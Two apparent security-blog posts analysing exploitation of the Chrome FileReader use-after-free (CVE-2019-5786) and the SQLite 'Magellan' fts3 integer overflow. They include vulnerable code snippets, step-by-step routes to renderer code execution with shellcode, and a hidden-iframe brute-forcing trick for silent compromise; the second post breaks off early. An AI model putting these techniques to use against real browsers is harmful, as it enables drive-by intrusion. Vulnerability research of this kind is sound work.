This post provides detailed analysis and an exploit achieving remote code execution for the recently fixed Chrome vulnerability that was observed by Google to be exploited in the wild.
Patch Analysis
The release notes from Google are short on information as usual:
[$N/A][936448] High CVE-2019-5786: Use-after-free in FileReader. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2019-02-27
As described on MDN, the “FileReader object lets web applications asynchronously read the contents of files (or raw data buffers) stored on the user’s computer, using File or Blob objects to specify the file or data to read”. It can be used to read the contents of files selected in a file open dialog by the user or Blobs created by script code. An example usage is shown in below.
1 2 3 4 5 6 7 8 9 10 11 12 13
let reader =new FileReader();
reader.onloadend=function(evt){
console.log(`contents as an ArrayBuffer: ${evt.target.result}`); }
reader.onprogress=function(evt){
console.log(`read ${evt.target.result.byteLength} bytes so far`); }
let contents ="filecontents";
f =new File([contents],"a.txt");
reader.readAsArrayBuffer(f);
It is important to note that the File or Blob contents are read asynchronously and the user JS code is notified of the progress via callbacks. The onprogress event may be fired multiple times while the reading is in progress, giving access to the contents read so far. The onloadend event is triggered once the operation is completed, either in success or failure.
Searching for the issue number in the Chromium git logs quickly reveals the patch for the vulnerability, which alters a single function. The original, vulnerable version is shown below.
This function gets called each time the result property is accessed in a callback after a FileReader.readAsArrayBuffer call in JavaScript.
While the object hierarchy around the C++ implementation of ArrayBuffers is relatively complicated, the important pieces are described below. Note that the C++ namespaces of the different classes are included so that distinguishing between objects implemented in Chromium (the WTF and blink namespaces) and v8 (everything under the v8 namespace) is easier.
WTF::ArrayBuffer: the embedder-side (Chromium) implementation of the ArrayBuffer concept. WTF::ArrayBuffer objects are reference counted and contain the raw pointer to their underlying memory buffer, which is freed when the reference count of an ArrayBuffer reaches 0.
blink::DOMArrayBufferBase: a garbage collected class containing a smart pointer to a WTF::ArrayBuffer.
blink::DOMArrayBuffer: class inheriting from blink::DOMArrayBufferBase, describing an ArrayBuffer in Chromium. Represented in the JavaScript engine by a v8::internal::JSArrayBuffer instance.
WTF::ArrayBufferBuilder: helper class to construct a WTF::ArrayBuffer incrementally. Holds a smart pointer to the ArrayBuffer.
blink::FileReaderLoader: responsible for loading the File or Blob contents. Uses WTF::ArrayBufferBuilder to build the ArrayBuffer as the data is read.
Comparing the code to the fixed version shown below, the most important difference is that if loading is not finished, the patched version creates new ArrayBuffer objects using the ArrayBuffer::Create function while the vulnerable version simply passes on a reference to the existing ArrayBuffer to the DOMArrayBuffer::Create function. ToArrayBuffer always returns the actual state of the ArrayBuffer being built but since the reading is a asynchronous, it may return the same one under some circumstances.
What are those circumstances? The raw_data_ variable in the code is of the type ArrayBufferBuilder, which is used to construct the result ArrayBuffer from the incrementally read data by dynamically allocating larger and larger underlying ArrayBuffers as needed. The ToArrayBuffer method returns a smart pointer to this underlying ArrayBuffer if the contents read so far fully occupy the currently allocated buffer and creates a new one via slicing if the buffer is not fully used yet.
One way to abuse the multiple references to the same ArrayBuffer is by detaching the ArrayBuffer through one and using the other, now dangling, reference. The javascript postMessage() method can be used to send messages to a JS Worker. It also has an additional parameter, transfer, which is an array of Transferable objects, the ownership of which are transfered to the Worker.
The transfer is done by the blink::SerializedScriptValue::TransferArrayBufferContents function, which iterates over the DOMArrayBuffers provided in the transfer parameter to postMessage and invokes the Transfer method of each, as shown below. blink::-DOMArrayBuffer::Transfer calls into WTF::ArrayBuffer::Transfer, which transfers the ownership of the underlying data buffer.
The vulnerability can be triggered by passing multiple blink::DOMArrayBuffers that reference the same underlying ArrayBuffer to postMessage. Transferring the first will take ownership of its buffer, then the transfer of the second will fail because its underlying ArrayBuffer has already been neutered. This causes blink::SerializedScriptValue::TransferArrayBufferContents to enter an error path, freeing the already transferred ArrayBuffer but leaving a dangling reference to it in the second blink::DOMArrayBuffer, which can then be used to access the freed memory through JavaScript.
SerializedScriptValue::TransferArrayBufferContents(
... for(auto* it = array_buffers.begin(); it != array_buffers.end();++it){
DOMArrayBufferBase* array_buffer_base =*it; if(visited.Contains(array_buffer_base)) continue;
visited.insert(array_buffer_base);
wtf_size_t index =static_cast(std::distance(array_buffers.begin(), it));
... DOMArrayBuffer* array_buffer =static_cast<domarraybuffer*>(array_buffer_base);</domarraybuffer*>
if(!array_buffer->Transfer(isolate, contents.at(index))){
exception_state.ThrowDOMException(DOMExceptionCode::kDataCloneError, "ArrayBuffer at index "+
String::Number(index)+ " could not be transferred."); return ArrayBufferContentsArray(); } }
Exploitation
The vulnerability can be turned into an arbitrary read/write primitive by reclaiming the memory region pointed to by the dangling pointer with JavaScript TypedArrays and corrupting their length and backing store pointers. This can then be further utilized to achieve arbitrary code execution in the renderer process.
Memory Management in Chrome
There are several aspects of memory management in Chrome that affect the reliability of the vulnerability. Chrome uses PartitionAlloc to allocate the backing store of ArrayBuffers. This effectively separates ArrayBuffer backing stores from other kinds of allocations, making the vulnerability unexploitable if the region that is freed is below 2MiB in size because PartitionAlloc will never reuse those allocations for other kinds of data. If the backing store size is above 2MiB, it is placed in a directly mapped region. Once freed, other kinds of allocations can reuse such a region. However, successfully reclaiming the freed region is only possible on 32-bit platforms, as PartitionAlloc adds additional randomness to its allocations via VirtualAlloc and mmap address hinting on 64-bit platforms beside their ASLR slides.
On a 32-bit Windows 7 install, the address space of a fresh Chrome process is similar to the one shown below. Note that these addresses are not static and will differ by the ASLR slide of Windows. Bottom-up allocations start from the lower end of the address space, the last one is the reserved region starting at 36681000. Windows heaps, PartitionAlloc regions, garbage collected heaps of v8 and Chrome, thread stacks are all placed among these regions in a bottom-up fashion. The backing store of the vulnerable ArrayBuffer will also reside here. An important thing to note is that Chrome makes a 512MiB reserved allocation (from 4600000 on the listing below) early on. This is done because the address space on x86 Windows systems is tight and gets fragmented quickly, therefore Chrome makes an early reservation to be able to hand it out for large contiguous allocations, like ArrayBuffers, if needed. Once an ArrayBuffer allocation fails, Chrome frees this reserved region and tries again. The logic that handles this could complicate exploitation, so the exploit starts out by attempting a large (1GiB) ArrayBuffer allocation. This will cause Chrome to free the reserved region, then fail to allocate again, since the address space cannot have a gap of the requested size. While most OOM conditions kill the renderer process, ArrayBuffer allocation failures are recoverable from JavaScript via exception handling.
Another important factor is the non-deterministic nature of the multiple garbage collectors that are involved in the managed heaps of Chrome. This introduces noise in the address space that is hard to control from JavaScript. Since the onprogress events used to trigger the vulnerability are also fired a non-deterministic number of times, and each event causes an allocation, the final location of the vulnerable ArrayBuffer is uncontrollable without the ability to trigger garbage collections on demand from JavaScript. The exploit uses the code shown below to invoke garbage collection. This makes it possible to free the results of onprogress events continuously, which helps in avoiding out-of-memory kills of the renderer process and also forces the dangling pointer created upon triggering the vulnerability to point to the lower end of the address space, somewhere into the beginning of the original 512MiB reserved region.
1 2 3 4 5 6 7 8
function force_gc(){ // forces a garbage collection to avoid OOM kills and help with heap non-determinism try{
var failure =new WebAssembly.Memory({initial:32767}); }catch(e){ // console.log(e.message); } }
Exploitation steps
The exploit achieves code execution by the following steps:
Allocate a large (128MiB) string that will be used as the source of the Blob passed to FileReader. This allocation will end up in the free region following the bottom-up allocations (from 36690000 in the address space listing above).
Free the 512MiB reserved region via an oversized ArrayBuffer allocation, as discussed previously.
Invoke FileReader.readAsArrayBuffer. A number of onprogress event will be triggered, the last couple of which can return references to the same underlying ArrayBuffer if the timing of the events is right. This step can be repeated indefinitely until successful without crashing the process.
Free the backing store of the ArrayBuffer through one of the references. Going forward, another reference can be used to access the dangling pointer.
Reclaim the freed region by spraying the heap with recognizable JavaScript objects, interspersed with TypedArrays.
Look for the recognizable pattern through the dangling reference. This enables leaking the address of arbitrary objects by setting them as properties on the found object, then reading back the property value through the dangling pointer.
Corrupt the backing store of a sprayed TypedArray and use it to achieve arbitrary read write access to the address space.
Load a WebAssembly module. This maps a read-write-executable memory region of 64KiB into the address space.
Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.
Increasing reliability
A single run of the exploit (which uses the steps detailed above) yields a success rate of about 25%, but using a trick you can turn that into effectively 100% reliability. Abusing the site isolation feature of Chrome enables brute-forcing, as described in another post on this blog by Ki Chan Ahn (look for the section titled “Making a Stealth Exploit by abusing Chrome’s Site Isolation”). A site corresponds to a (scheme:host) tuple, therefore hosting the brute forcing wrapper script on one site which loads the exploit repeatedly in an iframe from another host will cause new processes to be created for each exploit attempt. These iframes can be hidden from the user, resulting in a silent compromise. Using multiple sites to host the exploit code, the process can be parallelized (subject to memory and site-isolation process limits). The exploit developed uses a conservative timeout of 10 seconds for one iteration without parallelization and achieves code execution on average under half a minute.
The entire exploit code can be found on our github and it can be seen in action below.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
It’s interesting to see exploits in the wild still targeting older platforms like Windows 7 x86. The 32-bit address space is so crowded that additional randomization is disabled in PartitionAlloc and win32k lockdown is only available starting Windows 8. Therefore, the lack of mitigations on Windows 7 that are present in later versions of Windows make it a relatively soft target for exploitation.
Subscribers of our N-Day feed can leverage our in-depth analysis of critical vulnerabilities to defend themselves better, or use the provided exploits during internal penetration tests.
In December 2018, the Tencent Blade Team released an advisory for a bug they named “Magellan”, which affected all applications using sqlite versions prior to 2.5.3. In their public disclosure they state that they successfully exploited Google Home using this vulnerability. Despite several weeks having passed after the initial advisory, no public exploit was released. We were curious about how exploitable the bug was and whether it could be exploited on 64-bit desktop platforms. Therefore, we set out to create an exploit targeting Chrome on 64-bit Ubuntu.
Background
The Magellan bug is a bug in the sqlite database library. The bug lies in the fts3(Full Text Search) extension of sqlite, which was added in 2007. Chrome started to support the WebSQL standard (which is now deprecated) in 2010, so all versions between 2010 and the patched version should be vulnerable. The bug triggers when running a specific sequence of SQL queries, so only applications that can execute arbitrary SQL queries are vulnerable.
A short glance at the Vulnerability
In order to exploit a bug, the vulnerability has to be studied in detail. The bug was patched in commit 940f2adc8541a838. By looking at the commit, there were actually 3 bugs. We will look at the patch in the “fts3SegReaderNext” function, which was the bug that was actually used during exploitation. The other two bugs are very similar in nature, with the other bugs being slightly more complicated to trigger.
The gist of the patch is summarized below, with the bottom snippet being the patched version.
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
/* Both nPrefix and nSuffix were read by fts3GetVarint32() and so are
** between 0 and 0x7FFFFFFF. But the sum of the two may cause integer
** overflow - hence the (i64) casts. */ if((i64)nPrefix+nSuffix>(i64)pReader->nTermAlloc ){
i64 nNew =((i64)nPrefix+nSuffix)*2; char*zNew = sqlite3_realloc64(pReader->zTerm, nNew); if(!zNew ){ return SQLITE_NOMEM; }
pReader->zTerm = zNew;
pReader->nTermAlloc = nNew; }
The patched version explicitly casts nPrefix and nSuffix to i64, because both nPrefix and nSuffix is declared as int, and the check on the highlighted line can be bypassed if the addition of the two values overflow. By explicitly casting, the check will be correctly assessed, and the allocation size on the following line will also be correctly calculated. This new allocation will be placed in pReader->zTerm, and will further be used in line 38 for a memcpy operation.
Now going back to the version before the patch, there is no explicit casting as seen on line 21, and therefore, if the addition of the two values are larger than 2^31, the result will be negative and the inner code block will not be executed. What this means is that the code does not allocate a new block that is big enough for the memcpy operation below. This has several implications. But to fully understand what the bug gives to us, it is necessary to understand some core concepts of sqlite.
SQLite Internals
SQLite is a C-language library that implements a small, fast, self-contained SQL database engine, that claims to be the most used database engine in the world. SQLite implements most of the core sql features, as well as some features unique in SQLite. This blog post will not go in every detail of the database engine, but more like brush on the concepts that are relevant to the exploit.
SQLite Architecture
This is a summary of the Architecture of SQLite page on the official sqlite homepage. The SQLite is a small virtual machine that emits bytecode that later gets executed by the engine, just like an interpreter would do in a javascript engine. As such, it consists of a Tokenizer, Parser, Code Generator, and a Bytecode Engine. All of the SQL queries that are to be executed have to go through this pipeline. What this means in an exploiter’s point of view is that if the bug occurs in the Bytecode Engine phase, then there will be massive heap noise coming from the previous 3 stages, and the exploiter has to deal with them during Heap Feng-shui.
Another notable thing about SQLite is the use of B-Trees. SQLite uses B-Tree data structures to implement efficient, and fast searches on the values in the database. One thing to keep in mind is that the actual data of B-Trees is kept on disk, and not in memory. This is a logical decision because some databases could get very large, and keeping all the data in memory would induce a large memory overhead. However, performing every search of a query on-disk would introduce a huge disk IO overhead, and hence, SQLite uses something called a Page Cache. This Page Cache is responsible of placing recently queried database data pages onto memory, so that it could re-use them if another query searches for data on the same set of pages. The SQLite engine manages which pages should be mapped into memory and mapped out, so disk and memory overhead is well balanced. This gives another meaning to an exploiter’s point of view. Most objects that are created during a single query execution is destroyed after the Bytecode Engine is done with the query, and the only thing that remains in-memory is the data in the Page Cache. This means the actual data values that are living in the database tables are not a good target for Heap Feng-Shui, because most of the objects that represent the table data will be thrown away immediately after query execution. In addition, the actual table data will only lie somewhere in the middle of the Page Cache, which are just slabs of multiple pages that hold parts of the database file saved on the disk.
Full Text Search extensions
A brief introduction
The SQLite homepage describes Full-Text Search as the following.
FTS3 and FTS4 are SQLite virtual table modules that allows users to perform full-text searches on a set of documents. The most common (and effective) way to describe full-text searches is “what Google, Yahoo, and Bing do with documents placed on the World Wide Web”. Users input a term, or series of terms, perhaps connected by a binary operator or grouped together into a phrase, and the full-text query system finds the set of documents that best matches those terms considering the operators and groupings the user has specified.
Basically, the Full-Text Search (FTS) is an extension on SQLite, that enables it to query for search terms Google-style in an efficient way. The architecture and internals of the Full-Text Search engine is thoroughly described on the respective webpage. SQLite continuously upgraded their FTS engine, from fts1 to fts5. The vulnerability occurs on the 3rd version of the extension, fts3. This specific version is also the only version that is allowed to be used in Chrome. All requests to use the other 4 versions is rejected by Chrome. Therefore, it is important to understand some main concepts behind fts3.
Here is small example of how to issue an fts3 query.
CREATE VIRTUAL TABLE mail USING fts3(subject, body);
This will create an fts table that uses the Full-Text Search version 3 extension, and insert the content into their respective tables. In the above query, only one table mail is created, but under the hood there are 5 more tables created. Some of these tables will be discussed in detail in the following sections. During the INSERT statement, the VALUEs will be split into tokens and all tokens will have an index associated with it and inserted into their respective tables. During the SELECT statement, the search keyword(in the above example ‘sample’) will be looked up in the indexed token tables and if the keyword is matched, then the corresponding rows in the mail table will be returned. This was a brief summary of how the full text search works under the hood. Now it is time to dig in a little deeper into the elements that are related to the exploit.
Shadow Tables
In SQLite, there is something called Shadow Tables, which are basically just regular tables that exist to support the Virtual Table operations. These tables are created under the hood when issuing the CREATE VIRTUAL TABLE statement, and they store either the user INSERT’d data, or supplementary data that’s automatically inserted by the Virtual Table implementation. Since they are basically just regular tables, the content is accessible and modifiable just like any other table. An example of how the shadow tables are created is shown below.
sqlite>CREATE VIRTUAL TABLE mail USING fts3(subject, body);
sqlite>INSERTINTO mail(subject, body)VALUES('sample subject1','sample content');
sqlite>INSERTINTO mail(subject, body)VALUES('sample subject2','hello world');
sqlite>SELECT name FROM sqlite_master WHERETYPE='table';
mail
mail_content
mail_segments
mail_segdir
For instance, when a user issues an INSERT/UPDATE/DELETE statement on an fts3 table, the virtual table implementation modifies the rows in the underlying shadow tables, and not the original table mail that was created during the CREATE VIRTUAL TABLE statement. The reason why this is so is because when the user issues an INSERT statement, the entire content of the value has to be split into tokens, and all those tokens and indexes need to be stored individually, not by the query issued by the user but by the c code implementation of fts3. These tokens and indexes won’t be stored as is, but stored in a custom format defined by fts3 in order to pack all the values as compact as possible. In the fts3 case, the token (or term) and the index will be stored inside the tablename_segments and tablename_segdir shadow table with tablename being replaced with the actual table name that the user specified during the CREATE VIRTUAL TABLE statement. The entire sentence before it was split (sample subject, sample content in the above query) is going to be stored in the tablename_content shadow table. The remaining two shadow tables are tablename_stat and tablename_docsize which are support tables related to statistics, and the total count of index and terms. These two tables are only created when using the fts4 extension. The most important table in this article is the tablename_segdir table, which will be used to trigger the vulnerability later on.
Variable Length Format
In the fts3 virtual table module, the shadow tables store data as SQLite supported data types, or otherwise they are all joined into one giant chunk of data and stored in a compact form as a BLOB. One such example is the table below.
CREATETABLE %_segdir(
level INTEGER,
idx INTEGER,
start_block INTEGER,-- Blockid of first node in %_segments
leaves_end_block INTEGER,-- Blockid of last leaf node in %_segments
end_block INTEGER,-- Blockid of last node in %_segments
root BLOB,-- B-tree root node PRIMARYKEY(level, idx) );
Some values are stored as INTEGER values, but the root column is stored as a BLOB. As mentioned before, the values are stored in a compact format in order to save space. STRING values are stored as-is, with a length value preceding it. But then, how is the length value stored? SQLite uses a format which they term as fts Variable Length Format. How the algorithm works is as follows.
Represent the integer value into bits.
Split the integer value every 7 bits.
Take the current lowest 7 bits. If it is not the last(most significant) 7 bits, then add 1 to the most significant bit to form a full 8 bit value.
Repeat step 3 for all of the following 7bit values.
If it’s the last(most significant) 7bits, then add a 0 to the most significant bit to form a full 8 bit value.
Append all of the bytes that were created on step 3 and step 5 to create one long byte string, and that is the resulting Variable Length Integer.
Why SQLite uses this format is because it wants to use the exact amount of bytes needed to store the integer. It doesn’t want to pad additional 0’s that take up extra space, if the integer were to be saved in a fixed width format such as the standard c types. This format is something to keep in mind when constructing the payload in a later phase of exploitation.
Segment B-Tree Format
The Segment B-Tree is a B-Tree that is tailored to serve for the fts extension’s needs. Since it is a complex format, only the elements related to the vulnerability will be discussed.
These are the fields in the tablename_segdir table. It stores most of the token and index data, and the most important field is the root member. We will focus on this member in detail.
The B-Tree consists of tree nodes and node data. A node can be an interior node, or a leaf. For simplicity’s sake, we will assume that the B-Tree has only a single node, and that node is the root node as well as a leaf node. The format of a leaf node is as follows.
Here is a quote borrowed from the SQLite webpage.
The first term stored on each node (“Term 1” in the figure above) is stored verbatim. Each subsequent term is prefix-compressed with respect to its predecessor. Terms are stored within a page in sorted (memcmp) order.
To give an example, in accordance to the above picture, let’s say Term 1 is apple. The Length of Term 1 is 5, and the content of Term 1 is apple. Doclist 1 follows the format of a Doclist which is described here. They are essentially just an array of VarInt values, but they are not important for the discussion of the exploit and hence, will be skipped. Let’s say Term 2 is april. the Prefix Length of Term 2 will be 2. The Suffix Length of Term 2 will be, let’s say, 3. The Suffix Content of Term 2 is ril. As a last example, Term3’s Prefix Length, Suffix Length, and Suffix Content will be 5, 3, and pie respectively. This describes the term applepie. This might seem a little messy in text, so the following is an illustration of the entire BLOB that was just described.
This is what gets saved into root column of tablename_segdir when the user INSERTs “apple april applepie” into the fts table. As more content is inserted, the tree will grow interior nodes and more leaves, and the BLOB data of the entire tree will be stored in the tablename_segdir and tablename_segment shadow tables. This may not be entirely accurate, but this is basically what the indexing engine does, and how the engine stores all the search keywords and looks them up in a fast and efficient way. It should be noted that all the Length values within this leaf node is stored in a fts VarInt(Variable Length integer) format described above.
Revisiting the Bug
Now that the foundation has been laid out it is time to revisit the bug to get a better understanding of it, and what (initial) primitives the bug provides us. But before we dig into the bug itself, let’s discuss something about shadow tables, and how SQLite treated them before they were hardened in version 3.26.0.
As mentioned above, shadow tables are (were) essentially just normal tables with no access control mechanism on those special tables. As such, anyone that can execute arbitrary SQLite statements can read, modify shadow tables without any restrictions. This can become an issue when the virtual table implementation c code reads content from the shadow tables, and parses it. This is exactly what the bug relies on. The bug requires a value in one of the shadow tables to be set to a specific value, in order to trigger the bug.
After the Magellan bug was reported to SQLite, the developers of SQLite deemed that the ability to modify shadow tables was too powerful, and as a response decided to add a mitigation to it. This is the SQLITE_DBCONFIG_DEFENSIVE flag added in version 3.26.0. The actual bugs were fixed in 3.25.3, but the advisory recommends to upgrade to 3.26.0 in case any other bug is lurking in the code, so that exploitation of the potential bug can be blocked with the flag. Turning on this flag will make the shadow tables read-only to user executed SQL queries, and makes it impossible for malicious SQL queries to modify data within the shadow tables (This is not entirely true because there are lots of places where sql queries are dynamically created by the engine code itself, such as this function. SQL queries executed by the SQLite engine itself are immune to the SQLITE_DBCONFIG_DEFENSIVE flag, so some of these dynamic queries which are constructed based on values supplied by the attacker’s SQL query are potential bypass targets. These attacker controlled values can include spaces and special characters without any issues when the entire value is surrounded by quotes, so it makes it as a possible SQL injection attack vector. Still, the SQLITE_DBCONFIG_DEFENSIVE flag serves as a good front line defense).
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
To understand the code, the meaning of some variables should be explained. The fts3SegReaderNext function reads data from the fts3 B-Tree nodes, and traverses through each Term stored in a single node, and builds a full term based on the Term 1 string, and the Prefix and Suffix data for the rest of the Terms. pReader will hold the information of the current Term being built. The pNext variable points to the BLOB data of the tablename_segdir->root column. We will assume that the BLOB contains data that represents a leaf node, and contains exactly 2 Terms. pNext will continuously advance forward as data is read in by the program code. The function ftsGetVarint32 reads in an fts VarInt from the data pNext points to, and stores it into a 32-bit variable. pReader->zTerm will contain malloc’d space that is big enough to hold the term that was built on each iteration.
Now let’s assume that the tablename_segdir->root contains BLOB data such as follows.
The range of Term 1 was expanded to include the leftmost byte, which is a fixed value of 0 but internally represents the Prefix Length of Term 1. In this layout, fts3SegReaderNext would be called 2 times. In the first call, it would allocate a 0x10 sized space for the string apple on line 23 of the previous code listing, and actually copy in the value on line 34. On the second call, it would add the length of the prefix and suffix, and check if it exceeds 5*2 on line 21. Since it doesn’t, it reuses the space created on the first call, and builds a complete term by copying in the prefix and the suffix on line 34. This is done for all terms stored within the current node, but in the above case, it is only called twice. Now consider the following case.
Everything is the same with Term 1. A 0x10 space is allocated and apple is stored. However, on the second iteration, nPrefix is read from the blob as 0x7FFFFFFF, and nSuffix as 1. On line 21, nPrefix + nSuffix is 0x80000000 which is negative, thus bypassing the check which is operated on signed integers, and no allocation is performed. On line 34, The memcpy will operate with the source being &pReader->zTerm[0x7FFFFFFF]. As a note, the reason why the example value of nPrefix is set to 0x7FFFFFFF instead of 0xFFFFFFFF is because the function that actually reads the value, which is fts3GetVarint32, only reads up to a maximum value of 0x7FFFFFFF and any value above that is truncated.
Let’s first assess the meaning of this on a 32-bit platform. pReader->zTerm points to the beginning of apple, so &pReader->zTerm[0x7FFFFFFF] will point to 2 gigabytes after apple, and memcpy will copy 1 byte of the suffix “a” to that location. This is effectively an OOB write to data that is placed 2GB’s after Term 1‘s string. On a 32-bit platform, there is a possibility where &pReader->zTerm[0x7FFFFFFF] actually wraps around the address space and points to an address before apple. This could be used to our advantage, if it is possible to place interesting objects at the wrapped around address.
Now let’s see what elements of the OOB write is controllable. Since the attacker can freely modify the shadow table data, the entire content of the BLOB is controllable. This means that the string of Term 1 is controllable, and in turn, the allocation size of pReader->zTerm is controllable. The offset 0x7FFFFFFF of &pReader->zTerm[0x7FFFFFFF] is also controllable, provided that it is lower than 0x7FFFFFFF. Next, since the Suffix Length of Term 2 is attacker controlled, the memcpy size is also controlled. Finally, the actual data that is copied from the source of the memcpy comes from pNext, which points to Term 2‘s string data, so that is controlled too. This gives a restrictive, but powerful primitive of an OOB write, where the destination chunk size, memcpy source data content, and size is completely attacker controlled. The only requirement is that the target to be corrupted has to be placed 2GB’s after the destination chunk which is apple in the example.
The situation in a 64-bit environment is not very different from 32-bit. Everything is the same, except that &pReader->zTerm[0x7FFFFFFF] has no chance to wrap around the address space because the 64-bit address space is too big for that to happen. Also, in 32-bit, spraying the heap to cover the entire address space is a useful tool that can be used to aid exploitation, but it is not suitable to do so in 64-bit.
Now let’s talk about the restriction of the bug. Because the added values of nPrefix+nSuffix has to be bigger than 0x80000000 in order to pass the check on line 21, only certain nPrefix and nSuffix value pairs can be used to trigger the bug. For instance, a [0x7FFFFFFF, 1] pair is okay. [0x7FFFFFFE, 2], [0x7FFFFFFD, 3], [1, 0x7FFFFFFF], [2, 0x7FFFFFFE] is also okay. But [0x7FFFFFF0, 1] is not okay and will not pass the check and fall into the if block. If it falls into the if block, then a very large allocation will happen and the function will most likely return with SQLITE_NOMEM. Therefore, based on the values that are accepted by the bug, we can OOB write data in the following ranges.
Basically, the overwritten data must include the byte that is exactly 0x7FFFFFFF bytes away from the memcpy destination, and it could overwrite data either backwards or forward, with attacker controlled data of any size. This is the positional restriction of the bug. The OOB write cannot start at an arbitrary offset. After assessing the primitives given by the bug, we came to the conclusion that the bug could very well be exploitable on 64-bit platforms, provided that there is a good target for corruption, where the target object has certain tolerance for marginal errors. The next sections will describe the entire process of exploitation, including which targets were picked for corruption, and how they were abused for information leak and code execution.
Exploitation
Before diving in, it should be noted that the exploit was not designed to be 100% reliable. There are some sources of failure and some of them were addressed, but the ones that were too time consuming to fix were just left as is. The exploit was built as means to show that the bug is exploitable on Desktop platforms, and as such, the focus was placed on pushing through to achieve code execution, not maximizing reliability and speed. Nevertheless, we will discuss potential pitfalls and sources of failure on each stage of exploitation, and suggest possible solutions to address them.
The exploit is divided into 11 stages. The reason for dividing is because all SQL queries can not be stuffed into one huge transaction, because certain queries had to be split in order to achieve reliable corruption. Furthermore, a lot of SQL queries were dependent on previous queries, such as the infoleak phase, so the previous query results had to be parsed from javascript and passed on to the next batch of SQL queries. Each of the 11 stages will be described in detail, from the meaning of the cryptic queries, to the actual goal that the stage is trying to achieve.
The TCMalloc allocator
Before even attempting to build an exploit, it is essential to understand the allocator in play. The application that links the sqlite library would most likely use the system allocator that lies underneath, but in the situation of Chrome, things are a little different. According to the heap design documents of Chrome, Chrome hooks all calls to malloc and related calls, and redirects them to other custom allocators. This is different for every operating system, so it is important to understand which allocator Chrome chooses to use instead of the system allocators. In the case of Linux, Chrome redirects every malloc operation to TCMalloc. TCMalloc is an allocator developed and maintained by Google, with certain security properties kept in mind during development, as well as being a fast and efficient allocator.
The TCMalloc works very similar to allocators such as jemalloc, or the LFH, which splits a couple pages into equal sized chunks, and groups each different-sized chunks into seperate freelists. The way they are linked are kind of like PTMalloc’s fastbins, in that they are linked in a singly-linked list. The way they split a page into equal sized chunks kind of resembles that of jemalloc. However, unlike the LFH, there is no randomness element added in to the freelists, which makes the job easier. There are 2 (more specifically, 3) size categories of TCMalloc. In Chrome, chunks that have sizes lower than 0x8000 are categorized as small chunks, where sizes bigger are large chunks. The small chunks are further divided into 54 size classes (this value is specific to Chrome), and each chunks are grouped/managed by their respective size class. The free chunks are linked by singly-linked list as described above. In TCMalloc, there is something called a per-thread cache, and a central page cache. The threads each have their own freelists to manage their pool of small chunks. If the free-list of a certain chunk size reaches a certain threshold (this threshold is dynamic and changes to adapt to the heap usage), then the per-thread cache can toss a chunk of that chunk size’s freelist to the central cache. Or, if the combined size of all free chunks on all size classes of the thread cache reaches a threshold (4MB on Chrome), then the garbage collector kicks in and collects chunks from all freelists on the thread cache and gives them to the central cache. The central cache is the manager for all thread cachces. It issues new freelists if a thread cache’s freelists is exhausted, or it collects chunks of freelists if a thread cache’s freelist grows too big. The central cache is also the manager for large chunks. All chunk sizes larger than 0x8000 request chunks from the central cache, and the central cache manages the freelist of large chunks either by a singly-linked list, or a red-black tree.
All of this might seem too convoluted on text. Here are some illustrations borrowed from Sean Heelan’s excellent slides from 2011 InfiltrateCon.
An overview of the Thread Cache and the Central Page Cache
How the Central Cache conjures a new freelist
Singly-linked list of each size class of small chunks
The algorithm of tc_malloc(small_chunk_size)
Also, the following links are very helpful to get a general overview of how the TCMalloc allocator works.
And of course, the best reference is the source code itself.
Stage 1 and Stage 2
Now that the basics of the allocator have been touched, it’s time to find the right object to corrupt. One of the first targets that comes to mind is the Javascript objects on the v8 heap. This was the first target that we went for, because corrupting the right javascript object would instantly yield relative R/W, which can further be upgraded to an AAR/AAW. However, due to the way PartitionMalloc requests pages from the underlying system allocator, it was impossible to have the v8 heap placed behind TCMalloc’s heap. Even if it happened, chances were near zero.
Therefore, we decided to go for objects that are bound to be on the same heap. That is, objects that are allocated by SQLite itself. As mentioned in the SQLite Architecture section, the actual data value of the tables are not good targets to manipulate the heap. The B-Tree that represents the data also live on the Page Cache or the database file on disk. Even if parts of the B-Tree is briefly constructed in-memory upon a SELECT statement, it’s going to be immediately purged as soon as the Bytecode engine is done executing the SELECT statement. There would seem a very limited choice for objects that could influence the heap in a controlled fashion, if the table data values can not be used. However, there is one more object that could make a good candidate.
That is, Table and Column objects. It just so happens that SQLite decided to keep all Table and Column objects that were created by a CREATE statement in memory, and those objects persists until the database is closed completely. The decision behind this would be based on the assumption that Table and Column objects would not be too over-bloated, or at least the developers thought that such case would be rare enough, that the performance advantage of keeping those objects in memory would outweigh the memory costs of those objects. This is true to some degree. However, in practice, it is theoretically possible to construct Column Objects that could eat a colossal amount of memory while persisting in memory. This can be observed in the Limits In SQLite webpage.
The maximum number of bytes in the text of an SQL statement is limited to SQLITE_MAX_SQL_LENGTH which defaults to 1000000. You can redefine this limit to be as large as the smaller of SQLITE_MAX_LENGTH and 1073741824.
One thing to notice is that SQLite does not have an explicit limit on the length of a column name, or a table name. Both of them are just governed by the length of the SQL statement that contains those names, which is SQLITE_MAX_LENGTH. So as long as the length of the user query is lower than SQLITE_MAX_LENGTH, SQLite would happily accept column names of any size. Although SQLite itself defaults SQLITE_MAX_SQL_LENGTH to 1000000, Chrome redefines this value as 1000000000.
1 2 3 4 5 6 7 8 9 10
